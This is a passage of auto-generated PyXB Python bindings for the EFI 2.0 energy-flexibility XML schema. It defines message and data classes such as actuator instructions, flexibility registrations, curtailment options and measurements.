__actuatorId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'actuatorId'), 'actuatorId', '__httpwww_flexiblepower_orgefi_2_ActuatorInstruction_httpwww_flexiblepower_orgefi_2actuatorId', pyxb.binding.datatypes.int, required=True)
__actuatorId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 795, 2)
__actuatorId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 795, 2)
actuatorId = property(__actuatorId.value, __actuatorId.set, None, None)
_ElementMap.update({
__runningModeId.name() : __runningModeId,
__runningModeFactor.name() : __runningModeFactor,
__startTime.name() : __startTime
})
_AttributeMap.update({
__actuatorId.name() : __actuatorId
})
_module_typeBindings.ActuatorInstruction = ActuatorInstruction
Namespace.addCategoryObject('typeBinding', 'ActuatorInstruction', ActuatorInstruction)
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorInstructions with content type ELEMENT_ONLY
class ActuatorInstructions (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}ActuatorInstructions with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorInstructions')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 797, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}actuatorInstruction uses Python identifier actuatorInstruction
__actuatorInstruction = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstruction'), 'actuatorInstruction', '__httpwww_flexiblepower_orgefi_2_ActuatorInstructions_httpwww_flexiblepower_orgefi_2actuatorInstruction', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 799, 3), )
actuatorInstruction = property(__actuatorInstruction.value, __actuatorInstruction.set, None, None)
_ElementMap.update({
__actuatorInstruction.name() : __actuatorInstruction
})
_AttributeMap.update({
})
_module_typeBindings.ActuatorInstructions = ActuatorInstructions
Namespace.addCategoryObject('typeBinding', 'ActuatorInstructions', ActuatorInstructions)
# Complex type {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData with content type ELEMENT_ONLY
class AdjustableContinuousRunningModeData (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AdjustableContinuousRunningModeData')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 838, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}runningCost uses Python identifier runningCost
__runningCost = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), 'runningCost', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2runningCost', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3), )
runningCost = property(__runningCost.value, __runningCost.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}electricalPower uses Python identifier electricalPower
__electricalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), 'electricalPower', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2electricalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3), )
electricalPower = property(__electricalPower.value, __electricalPower.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}gasFlowRate uses Python identifier gasFlowRate
__gasFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), 'gasFlowRate', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2gasFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3), )
gasFlowRate = property(__gasFlowRate.value, __gasFlowRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatTemperature uses Python identifier heatTemperature
__heatTemperature = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), 'heatTemperature', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatTemperature', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3), )
heatTemperature = property(__heatTemperature.value, __heatTemperature.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatFlowRate uses Python identifier heatFlowRate
__heatFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), 'heatFlowRate', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3), )
heatFlowRate = property(__heatFlowRate.value, __heatFlowRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatThermalPower uses Python identifier heatThermalPower
__heatThermalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), 'heatThermalPower', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatThermalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3), )
heatThermalPower = property(__heatThermalPower.value, __heatThermalPower.set, None, None)
_ElementMap.update({
__runningCost.name() : __runningCost,
__electricalPower.name() : __electricalPower,
__gasFlowRate.name() : __gasFlowRate,
__heatTemperature.name() : __heatTemperature,
__heatFlowRate.name() : __heatFlowRate,
__heatThermalPower.name() : __heatThermalPower
})
_AttributeMap.update({
})
_module_typeBindings.AdjustableContinuousRunningModeData = AdjustableContinuousRunningModeData
Namespace.addCategoryObject('typeBinding', 'AdjustableContinuousRunningModeData', AdjustableContinuousRunningModeData)
# Complex type {http://www.flexiblepower.org/efi-2}AdjustableRunningModes with content type ELEMENT_ONLY
class AdjustableRunningModes (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}AdjustableRunningModes with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AdjustableRunningModes')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 870, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}discreteRunningMode uses Python identifier discreteRunningMode
__discreteRunningMode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningMode'), 'discreteRunningMode', '__httpwww_flexiblepower_orgefi_2_AdjustableRunningModes_httpwww_flexiblepower_orgefi_2discreteRunningMode', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 873, 4), )
discreteRunningMode = property(__discreteRunningMode.value, __discreteRunningMode.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}continuousRunningMode uses Python identifier continuousRunningMode
__continuousRunningMode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningMode'), 'continuousRunningMode', '__httpwww_flexiblepower_orgefi_2_AdjustableRunningModes_httpwww_flexiblepower_orgefi_2continuousRunningMode', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 874, 4), )
continuousRunningMode = property(__continuousRunningMode.value, __continuousRunningMode.set, None, None)
_ElementMap.update({
__discreteRunningMode.name() : __discreteRunningMode,
__continuousRunningMode.name() : __continuousRunningMode
})
_AttributeMap.update({
})
_module_typeBindings.AdjustableRunningModes = AdjustableRunningModes
Namespace.addCategoryObject('typeBinding', 'AdjustableRunningModes', AdjustableRunningModes)
# Complex type {http://www.flexiblepower.org/efi-2}FlexibilityRegistration with content type ELEMENT_ONLY
class FlexibilityRegistration (EfiMessage):
"""Complex type {http://www.flexiblepower.org/efi-2}FlexibilityRegistration with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'FlexibilityRegistration')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 42, 1)
_ElementMap = EfiMessage._ElementMap.copy()
_AttributeMap = EfiMessage._AttributeMap.copy()
# Base type is EfiMessage
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element {http://www.flexiblepower.org/efi-2}instructionProcessingDelay uses Python identifier instructionProcessingDelay
__instructionProcessingDelay = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay'), 'instructionProcessingDelay', '__httpwww_flexiblepower_orgefi_2_FlexibilityRegistration_httpwww_flexiblepower_orgefi_2instructionProcessingDelay', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5), )
instructionProcessingDelay = property(__instructionProcessingDelay.value, __instructionProcessingDelay.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}deviceDescription uses Python identifier deviceDescription
__deviceDescription = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription'), 'deviceDescription', '__httpwww_flexiblepower_orgefi_2_FlexibilityRegistration_httpwww_flexiblepower_orgefi_2deviceDescription', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5), )
deviceDescription = property(__deviceDescription.value, __deviceDescription.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}currency uses Python identifier currency
__currency = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'currency'), 'currency', '__httpwww_flexiblepower_orgefi_2_FlexibilityRegistration_httpwww_flexiblepower_orgefi_2currency', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5), )
currency = property(__currency.value, __currency.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__instructionProcessingDelay.name() : __instructionProcessingDelay,
__deviceDescription.name() : __deviceDescription,
__currency.name() : __currency
})
_AttributeMap.update({
})
_module_typeBindings.FlexibilityRegistration = FlexibilityRegistration
Namespace.addCategoryObject('typeBinding', 'FlexibilityRegistration', FlexibilityRegistration)
# Complex type {http://www.flexiblepower.org/efi-2}FlexibilityUpdate with content type ELEMENT_ONLY
class FlexibilityUpdate (EfiMessage):
"""Complex type {http://www.flexiblepower.org/efi-2}FlexibilityUpdate with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'FlexibilityUpdate')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 53, 1)
_ElementMap = EfiMessage._ElementMap.copy()
_AttributeMap = EfiMessage._AttributeMap.copy()
# Base type is EfiMessage
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element {http://www.flexiblepower.org/efi-2}flexibilityUpdateId uses Python identifier flexibilityUpdateId
__flexibilityUpdateId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId'), 'flexibilityUpdateId', '__httpwww_flexiblepower_orgefi_2_FlexibilityUpdate_httpwww_flexiblepower_orgefi_2flexibilityUpdateId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5), )
flexibilityUpdateId = property(__flexibilityUpdateId.value, __flexibilityUpdateId.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}validFrom uses Python identifier validFrom
__validFrom = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'validFrom'), 'validFrom', '__httpwww_flexiblepower_orgefi_2_FlexibilityUpdate_httpwww_flexiblepower_orgefi_2validFrom', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5), )
validFrom = property(__validFrom.value, __validFrom.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__flexibilityUpdateId.name() : __flexibilityUpdateId,
__validFrom.name() : __validFrom
})
_AttributeMap.update({
})
_module_typeBindings.FlexibilityUpdate = FlexibilityUpdate
Namespace.addCategoryObject('typeBinding', 'FlexibilityUpdate', FlexibilityUpdate)
# Complex type {http://www.flexiblepower.org/efi-2}Instruction with content type ELEMENT_ONLY
class Instruction (EfiMessage):
"""Complex type {http://www.flexiblepower.org/efi-2}Instruction with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Instruction')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 63, 1)
_ElementMap = EfiMessage._ElementMap.copy()
_AttributeMap = EfiMessage._AttributeMap.copy()
# Base type is EfiMessage
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element {http://www.flexiblepower.org/efi-2}instructionId uses Python identifier instructionId
__instructionId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), 'instructionId', '__httpwww_flexiblepower_orgefi_2_Instruction_httpwww_flexiblepower_orgefi_2instructionId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5), )
instructionId = property(__instructionId.value, __instructionId.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}flexibilityUpdateId uses Python identifier flexibilityUpdateId
__flexibilityUpdateId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId'), 'flexibilityUpdateId', '__httpwww_flexiblepower_orgefi_2_Instruction_httpwww_flexiblepower_orgefi_2flexibilityUpdateId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5), )
flexibilityUpdateId = property(__flexibilityUpdateId.value, __flexibilityUpdateId.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}isEmergencyInstruction uses Python identifier isEmergencyInstruction
__isEmergencyInstruction = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction'), 'isEmergencyInstruction', '__httpwww_flexiblepower_orgefi_2_Instruction_httpwww_flexiblepower_orgefi_2isEmergencyInstruction', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5), )
isEmergencyInstruction = property(__isEmergencyInstruction.value, __isEmergencyInstruction.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__instructionId.name() : __instructionId,
__flexibilityUpdateId.name() : __flexibilityUpdateId,
__isEmergencyInstruction.name() : __isEmergencyInstruction
})
_AttributeMap.update({
})
_module_typeBindings.Instruction = Instruction
Namespace.addCategoryObject('typeBinding', 'Instruction', Instruction)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_12 (EfiMessage):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 75, 2)
_ElementMap = EfiMessage._ElementMap.copy()
_AttributeMap = EfiMessage._AttributeMap.copy()
# Base type is EfiMessage
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element {http://www.flexiblepower.org/efi-2}instructionId uses Python identifier instructionId
__instructionId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), 'instructionId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_12_httpwww_flexiblepower_orgefi_2instructionId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 79, 6), )
instructionId = property(__instructionId.value, __instructionId.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}status uses Python identifier status
__status = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'status'), 'status', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_12_httpwww_flexiblepower_orgefi_2status', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 80, 6), )
status = property(__status.value, __status.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}debugInformation uses Python identifier debugInformation
__debugInformation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'debugInformation'), 'debugInformation', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_12_httpwww_flexiblepower_orgefi_2debugInformation', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 81, 6), )
debugInformation = property(__debugInformation.value, __debugInformation.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__instructionId.name() : __instructionId,
__status.name() : __status,
__debugInformation.name() : __debugInformation
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_12 = CTD_ANON_12
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_13 (EfiMessage):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 97, 2)
_ElementMap = EfiMessage._ElementMap.copy()
_AttributeMap = EfiMessage._AttributeMap.copy()
# Base type is EfiMessage
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_13 = CTD_ANON_13
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_14 (EfiMessage):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 104, 2)
_ElementMap = EfiMessage._ElementMap.copy()
_AttributeMap = EfiMessage._AttributeMap.copy()
# Base type is EfiMessage
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element {http://www.flexiblepower.org/efi-2}instructionId uses Python identifier instructionId
__instructionId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), 'instructionId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_14_httpwww_flexiblepower_orgefi_2instructionId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 108, 6), )
instructionId = property(__instructionId.value, __instructionId.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__instructionId.name() : __instructionId
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_14 = CTD_ANON_14
# Complex type {http://www.flexiblepower.org/efi-2}ProbabilityAttributesWithDuration with content type EMPTY
class ProbabilityAttributesWithDuration (ProbabilityAttributes):
"""Complex type {http://www.flexiblepower.org/efi-2}ProbabilityAttributesWithDuration with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ProbabilityAttributesWithDuration')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 137, 1)
_ElementMap = ProbabilityAttributes._ElementMap.copy()
_AttributeMap = ProbabilityAttributes._AttributeMap.copy()
# Base type is ProbabilityAttributes
# Attribute the68PPRLower inherited from {http://www.flexiblepower.org/efi-2}ProbabilityAttributes
# Attribute the95PPRLower inherited from {http://www.flexiblepower.org/efi-2}ProbabilityAttributes
# Attribute expected inherited from {http://www.flexiblepower.org/efi-2}ProbabilityAttributes
# Attribute the95PPRUpper inherited from {http://www.flexiblepower.org/efi-2}ProbabilityAttributes
# Attribute the68PPRUpper inherited from {http://www.flexiblepower.org/efi-2}ProbabilityAttributes
# Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
__duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributesWithDuration_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
__duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 140, 4)
__duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 140, 4)
duration = property(__duration.value, __duration.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__duration.name() : __duration
})
_module_typeBindings.ProbabilityAttributesWithDuration = ProbabilityAttributesWithDuration
Namespace.addCategoryObject('typeBinding', 'ProbabilityAttributesWithDuration', ProbabilityAttributesWithDuration)
# Complex type {http://www.flexiblepower.org/efi-2}CurtailmentOption with content type ELEMENT_ONLY
class CurtailmentOption (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}CurtailmentOption with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentOption')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 236, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}curtailmentRange uses Python identifier curtailmentRange
__curtailmentRange = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'curtailmentRange'), 'curtailmentRange', '__httpwww_flexiblepower_orgefi_2_CurtailmentOption_httpwww_flexiblepower_orgefi_2curtailmentRange', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 238, 3), )
curtailmentRange = property(__curtailmentRange.value, __curtailmentRange.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}curtailmentQuantity uses Python identifier curtailmentQuantity
__curtailmentQuantity = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'curtailmentQuantity'), 'curtailmentQuantity', '__httpwww_flexiblepower_orgefi_2_CurtailmentOption_httpwww_flexiblepower_orgefi_2curtailmentQuantity', _module_typeBindings.CurtailmentQuantity, required=True)
__curtailmentQuantity._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 240, 2)
__curtailmentQuantity._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 240, 2)
curtailmentQuantity = property(__curtailmentQuantity.value, __curtailmentQuantity.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}minimalCurtailmentDuration uses Python identifier minimalCurtailmentDuration
__minimalCurtailmentDuration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'minimalCurtailmentDuration'), 'minimalCurtailmentDuration', '__httpwww_flexiblepower_orgefi_2_CurtailmentOption_httpwww_flexiblepower_orgefi_2minimalCurtailmentDuration', pyxb.binding.datatypes.duration, unicode_default='PT0S')
__minimalCurtailmentDuration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 241, 2)
__minimalCurtailmentDuration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 241, 2)
minimalCurtailmentDuration = property(__minimalCurtailmentDuration.value, __minimalCurtailmentDuration.set, None, None)
_ElementMap.update({
__curtailmentRange.name() : __curtailmentRange
})
_AttributeMap.update({
__curtailmentQuantity.name() : __curtailmentQuantity,
__minimalCurtailmentDuration.name() : __minimalCurtailmentDuration
})
_module_typeBindings.CurtailmentOption = CurtailmentOption
Namespace.addCategoryObject('typeBinding', 'CurtailmentOption', CurtailmentOption)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_15 (EfiMessage):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 253, 2)
_ElementMap = EfiMessage._ElementMap.copy()
_AttributeMap = EfiMessage._AttributeMap.copy()
# Base type is EfiMessage
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element {http://www.flexiblepower.org/efi-2}measurementTimestamp uses Python identifier measurementTimestamp
__measurementTimestamp = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'measurementTimestamp'), 'measurementTimestamp', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_15_httpwww_flexiblepower_orgefi_2measurementTimestamp', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 257, 6), )
measurementTimestamp = property(__measurementTimestamp.value, __measurementTimestamp.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}electricityMeasurement uses Python identifier electricityMeasurement
__electricityMeasurement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricityMeasurement'), 'electricityMeasurement', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_15_httpwww_flexiblepower_orgefi_2electricityMeasurement', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 258, 6), )
electricityMeasurement = property(__electricityMeasurement.value, __electricityMeasurement.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}gasMeasurement uses Python identifier gasMeasurement
__gasMeasurement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasMeasurement'), 'gasMeasurement', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_15_httpwww_flexiblepower_orgefi_2gasMeasurement', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 263, 6), )
gasMeasurement = property(__gasMeasurement.value, __gasMeasurement.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatMeasurement uses Python identifier heatMeasurement
__heatMeasurement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatMeasurement'), 'heatMeasurement', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_15_httpwww_flexiblepower_orgefi_2heatMeasurement', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 268, 6), )
heatMeasurement = property(__heatMeasurement.value, __heatMeasurement.set, None, None)
# Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
_ElementMap.update({
__measurementTimestamp.name() : __measurementTimestamp,
__electricityMeasurement.name() : __electricityMeasurement,
__gasMeasurement.name() : __gasMeasurement,
__heatMeasurement.name() : __heatMeasurement
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_15 = CTD_ANON_15
# Complex type {http://www.flexiblepower.org/efi-2}CurtailmentProfile with content type ELEMENT_ONLY
class CurtailmentProfile (pyxb.binding.basis.complexTypeDefinition):
